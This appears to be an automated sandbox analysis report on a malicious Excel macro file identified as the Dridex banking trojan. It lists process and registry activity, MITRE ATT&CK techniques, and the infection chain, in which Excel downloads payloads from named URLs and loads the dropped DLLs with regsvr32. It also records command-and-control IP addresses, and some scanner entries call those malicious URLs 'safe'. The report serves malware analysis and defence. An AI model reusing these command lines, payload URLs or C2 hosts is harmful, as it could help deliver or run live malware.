Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: sample20210113-01.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: sample20210113-01.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: sample20210113-01.xlsm | Initial sample: OLE indicators vbamacros = False
Source: lpxtpiw[1].zip.0.dr | Static PE information: section name: .2
Source: lpxtpiw[1].zip.0.dr | Static PE information: section name: .rdata2
Source: lpxtpiw[1].zip.0.dr | Static PE information: section name: .text5
Source: lpxtpiw[1].zip.0.dr | Static PE information: section name: .text4
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0021BFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001E7172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_002062CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001FF6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001E899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001E89CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0020FB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001E1D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001E0E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\ndrztpo.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001F88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key enumerated: More than 188 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00CDCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_004ECEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00CC3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_001F88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00CC6C50 LdrLoadDll,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0021B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0021B6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00CC7A60 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_004D7A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 157.7.166.26 233
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 195.231.69.151 49
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 221.126.244.72 187
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00CC2980 GetUserNameW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Scripting32; Exploitation for Client Execution43; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Privilege Escalation: Process Injection112; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Defense Evasion: Masquerading11; Virtualization/Sandbox Evasion1; Process Injection112; Scripting32; Obfuscated Files or Information1; Regsvr321; Compile After Delivery; Indicator Removal from Tools; Masquerading; Invalid Code Signature
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: Query Registry1; Security Software Discovery1; Virtualization/Sandbox Evasion1; Process Discovery11; Account Discovery1; System Owner/User Discovery1; Remote System Discovery1; System Network Configuration Discovery1; File and Directory Discovery2; System Information Discovery24
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: Archive Collected Data1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: Encrypted Channel12; Non-Standard Port1; Ingress Tool Transfer13; Non-Application Layer Protocol2; Application Layer Protocol23; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 339173 | Sample: sample20210113-01.xlsm | Start date: 13/01/2021 | Architecture: WINDOWS | Score: 100

Start node signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 10 other signatures

  • EXCEL.EXE 243 68 (started)
    • DNS/IP: bipolarmalta.mccarthy.ws, 35.214.225.210, ports 49165, 80, GOOGLE-2US, United States
    • DNS/IP: oudtshoornpharmacies.co.za, 154.66.197.71, ports 49166, 80, DIAMATRIXZA, South Africa
    • DNS/IP: sendgrid.invoteqleads.com, 104.24.124.127, ports 49169, 80, CLOUDFLARENETUS, United States
    • Dropped: C:\Users\user\AppData\Local\...\pgjasrqd.dll (PE32)
    • Dropped: C:\Users\user\AppData\Local\...\ndrztpo.dll (PE32)
    • Dropped: C:\Users\user\AppData\...\lpxtpiw[1].zip (PE32)
    • Dropped: 2 other malicious files
    • Signatures: Document exploit detected (creates forbidden files); Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
    • regsvr32.exe (started)
      • regsvr32.exe 11 (started)
        • DNS/IP: 157.7.166.26, ports 49172, 49174, 49178, INTERQGMOInternetIncJP, Japan
        • DNS/IP: 221.126.244.72, ports 443, 49167, 49170, HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHK, Hong Kong
        • DNS/IP: 195.231.69.151, ports 3889, 49171, 49173, ARUBA-CLOUDIT, Italy
        • Signature: Detected Dridex e-Banking trojan
    • regsvr32.exe (started)
      • regsvr32.exe 9 (started)
        • Signature: System process connects to network (likely due to code injection or exploit)
    • regsvr32.exe (started)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
sample20210113-01.xlsm | 25% | Virustotal | | Browse
sample20210113-01.xlsm | 11% | ReversingLabs | Script-Macro.Trojan.Wacatac |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\ndrztpo.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\pgjasrqd.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip | 100% | Joe Sandbox ML | |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
sendgrid.invoteqleads.com | 0% | Virustotal | | Browse
bipolarmalta.mccarthy.ws | 0% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
https://221.126.244.72/3 | 0% | Avira URL Cloud | safe |
http://bipolarmalta.mccarthy.ws/lpxtpiw.zip | 6% | Virustotal | | Browse
http://bipolarmalta.mccarthy.ws/lpxtpiw.zip | 0% | Avira URL Cloud | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
https://157.7.166.26:5353/ | 0% | Avira URL Cloud | safe |
https://221.126.244.72/O | 0% | Avira URL Cloud | safe |
http://sendgrid.invoteqleads.com/usc3d1.rar | 0% | Avira URL Cloud | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
https://221.126.244.72/ | 0% | Avira URL Cloud | safe |
https://157.7.166.26/ | 0% | Avira URL Cloud | safe |
https://195.231.69.151:3889/G | 0% | Avira URL Cloud | safe |
https://195.231.69.151/c7 | 0% | Avira URL Cloud | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
https://195.231.69.151:3889/ | 0% | Avira URL Cloud | safe |
http://crl.microsoft.v& | 0% | Avira URL Cloud | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
https://195.231.69.151/ | 0% | Avira URL Cloud | safe |
https://195.231.69.151:3889/hy | 0% | Avira URL Cloud | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
https://195.231.69.151/d7 | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sendgrid.invoteqleads.com | 104.24.124.127 | true | false | | unknown
bipolarmalta.mccarthy.ws | 35.214.225.210 | true | false | | unknown
oudtshoornpharmacies.co.za | 154.66.197.71 | true | false | | high

    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://bipolarmalta.mccarthy.ws/lpxtpiw.zip | true | 6%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://sendgrid.invoteqleads.com/usc3d1.rar | false | Avira URL Cloud: safe | unknown
http://oudtshoornpharmacies.co.za/dyu828kp.rar | false | | high

      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | | high
http://ocsp.entrust.net03 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | URL Reputation: safe (x4) | unknown
https://221.126.244.72/3 | regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | URL Reputation: safe (x4) | unknown
https://157.7.166.26:5353/ | regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://221.126.244.72/O | regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
https://221.126.244.72/ | regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385411279.0000000000591000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://157.7.166.26/ | regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://195.231.69.151:3889/G | regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://195.231.69.151/c7 | regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.%s.comPA | regsvr32.exe, 00000004.00000002.2386925336.0000000002380000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386727384.0000000002380000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | low
https://195.231.69.151:3889/ | regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoft.v& | regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
http://ocsp.entrust.net0D | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
https://195.231.69.151/ | regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://195.231.69.151:3889/hy | regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2385462250.0000000001E20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385318587.0000000000690000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385314469.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2385487805.00000000009B0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2117872818.0000000001CF0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
https://195.231.69.151/d7 | regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmp | false | | high

            Contacted IPs


            Public

IP | Domain | Country | ASN | ASN Name | Malicious
195.231.69.151 | unknown | Italy | 202242 | ARUBA-CLOUDIT | true
154.66.197.71 | unknown | South Africa | 327979 | DIAMATRIXZA | false
104.24.124.127 | unknown | United States | 13335 | CLOUDFLARENETUS | false
35.214.225.210 | unknown | United States | 19527 | GOOGLE-2US | false
157.7.166.26 | unknown | Japan | 7506 | INTERQGMOInternetIncJP | true
221.126.244.72 | unknown | Hong Kong | 9304 | HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHK | true

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:339173
            Start date:13.01.2021
            Start time:16:38:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 19s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:sample20210113-01.xlsm
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.bank.expl.evad.winXLSM@11/18@3/6
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 32.5% (good quality ratio 32.3%)
            • Quality average: 80.3%
            • Quality standard deviation: 18.5%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsm
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210, 8.253.95.249, 67.26.137.254, 8.248.113.254, 67.27.233.126, 8.253.95.120
            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.

            Simulations

            Behavior and APIs

Time | Type | Description
16:38:51 | API Interceptor | 1699x Sleep call for process: regsvr32.exe modified

            Joe Sandbox View / Context

            IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
195.231.69.151 | og0gax.dll | Get hash | malicious | Browse |
195.231.69.151 | M1OrQwls8C.dll | Get hash | malicious | Browse |
154.66.197.71 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | davidsarmoury.co.za/pwux2gh.zip

                Domains

                No context

                ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
GOOGLE-2US | info_2020_NJY_31940448.doc | Get hash | malicious | Browse | 35.208.69.64
GOOGLE-2US | PO#218740.exe | Get hash | malicious | Browse | 35.208.174.213
GOOGLE-2US | Consignment Document PL&BL Draft.exe | Get hash | malicious | Browse | 35.214.23.27
GOOGLE-2US | Consignment Details.exe | Get hash | malicious | Browse | 35.208.179.96
GOOGLE-2US | S4P1JiBZIZxvtFR.exe | Get hash | malicious | Browse | 35.214.203.1
GOOGLE-2US | Archivo_29_48214503.doc | Get hash | malicious | Browse | 35.214.169.246
GOOGLE-2US | info.doc | Get hash | malicious | Browse | 35.208.84.24
GOOGLE-2US | Adjunto 29 886_473411.doc | Get hash | malicious | Browse | 35.209.78.196
GOOGLE-2US | Informacion_29.doc | Get hash | malicious | Browse | 35.214.169.246
GOOGLE-2US | Informacion_29.doc | Get hash | malicious | Browse | 35.209.78.196
GOOGLE-2US | form.doc | Get hash | malicious | Browse | 35.214.199.246
GOOGLE-2US | Nuevo pedido.exe | Get hash | malicious | Browse | 35.209.33.122
GOOGLE-2US | Info_122020.doc | Get hash | malicious | Browse | 35.208.84.24
GOOGLE-2US | 84-2020-98-6493170.doc | Get hash | malicious | Browse | 35.208.104.82
GOOGLE-2US | rib.exe | Get hash | malicious | Browse | 35.209.110.77
GOOGLE-2US | rep_2020_12_29_N918980.doc | Get hash | malicious | Browse | 35.208.69.64
GOOGLE-2US | Adjunto.doc | Get hash | malicious | Browse | 35.214.159.46
GOOGLE-2US | Messaggio-3012-2020.doc | Get hash | malicious | Browse | 35.214.159.46
GOOGLE-2US | Documento-2912-122020.doc | Get hash | malicious | Browse | 35.208.84.24
GOOGLE-2US | Documento_I_2612.doc | Get hash | malicious | Browse | 35.208.84.24
ARUBA-CLOUDIT | og0gax.dll | Get hash | malicious | Browse | 195.231.69.151
ARUBA-CLOUDIT | M1OrQwls8C.dll | Get hash | malicious | Browse | 195.231.69.151
CLOUDFLARENETUS | Byrnes Gould PLLC.odt | Get hash | malicious | Browse | 104.16.19.94
CLOUDFLARENETUS | aNmkT4KLJX.exe | Get hash | malicious | Browse | 104.23.98.190
CLOUDFLARENETUS | BankSwiftCopyUSD95000.ppt | Get hash | malicious | Browse | 104.18.49.20
CLOUDFLARENETUS | brewin-Invoice024768-xlsx.Html | Get hash | malicious | Browse | 104.16.19.94
CLOUDFLARENETUS | Pokana2021011357.doc | Get hash | malicious | Browse | 172.67.195.152
CLOUDFLARENETUS | 09000000000000h.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | PO#218740.exe | Get hash | malicious | Browse | 172.67.164.253
CLOUDFLARENETUS | PO-5042.exe | Get hash | malicious | Browse | 104.28.4.151
CLOUDFLARENETUS | PO-000202112.exe | Get hash | malicious | Browse | 172.67.151.49
CLOUDFLARENETUS | 20210113155320.exe | Get hash | malicious | Browse | 66.235.200.145
CLOUDFLARENETUS | 13012021.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENETUS | Geno_Quotation,pdf.exe | Get hash | malicious | Browse | 104.23.99.190
CLOUDFLARENETUS | Po-covid19 2372#w2..exe | Get hash | malicious | Browse | 104.24.109.70
CLOUDFLARENETUS | FtLroeD5Kmr6rNC.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENETUS | 6blnUJRr4yKrjCS.exe | Get hash | malicious | Browse | 104.24.111.173
CLOUDFLARENETUS | 3S1VPrT4IK.exe | Get hash | malicious | Browse | 104.19.152.30
CLOUDFLARENETUS | cGLVytu1ps.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENETUS | onYLLDPXswyCVZu.exe | Get hash | malicious | Browse | 104.28.4.151
CLOUDFLARENETUS | AOA4sx8Z7l.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENETUS | PO-75013.exe | Get hash | malicious | Browse | 104.28.4.151
DIAMATRIXZA | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 154.66.197.71

                JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
